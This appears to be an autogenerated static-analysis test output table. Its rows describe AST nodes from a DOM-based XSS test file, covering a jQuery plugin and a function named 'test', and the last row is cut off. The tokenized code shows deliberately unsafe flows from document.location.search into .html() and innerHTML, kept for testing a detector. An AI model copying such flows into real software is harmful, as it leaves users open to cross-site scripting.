autogenerated/Xss/DomBasedXss/tst.js:366:2:366:17 | $.fn[pluginName] | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:17 | $.fn[pluginName] | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:17 | $.fn[pluginName] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:28 | $.fn[pl ... yPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:28 | $.fn[pl ... yPlugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:28 | $.fn[pl ... yPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:28 | $.fn[pl ... yPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:28 | $.fn[pl ... yPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:4:366:5 | fn | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:4:366:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:4:366:5 | fn | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:4:366:5 | fn | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:4:366:5 | fn | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:7:366:16 | pluginName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:7:366:16 | pluginName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:7:366:16 | pluginName | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:7:366:16 | pluginName | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:7:366:16 | pluginName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:21:366:28 | myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:21:366:28 | myPlugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:21:366:28 | myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:21:366:28 | myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:21:366:28 | myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:370:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:370:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:370:0 | this | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:370:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:370:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | 'arguments' object of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | 'arguments' object of function test | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | 'arguments' object of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | exceptional return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | exceptional return of function test | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | exceptional return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | functio ... [0]);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | functio ... [0]);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | functio ... [0]);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | return of function test | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:370:1:378:1 | return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:370:10:370:13 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:370:10:370:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:370:10:370:13 | test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:12 | target | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:12 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target ... .search | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:7:371:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:23 | document | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:23 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:32 | document.location | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:32 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:39 | documen ... .search | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:39 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:16:371:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:25:371:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:25:371:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:25:371:32 | location | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:25:371:32 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:25:371:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:371:34:371:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:371:34:371:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:371:34:371:39 | search | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:371:34:371:39 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:371:34:371:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | $('myId ... target) | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | $('myId ... target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | exceptional return of $('myId ... target) | contextFunctionInterfaces | 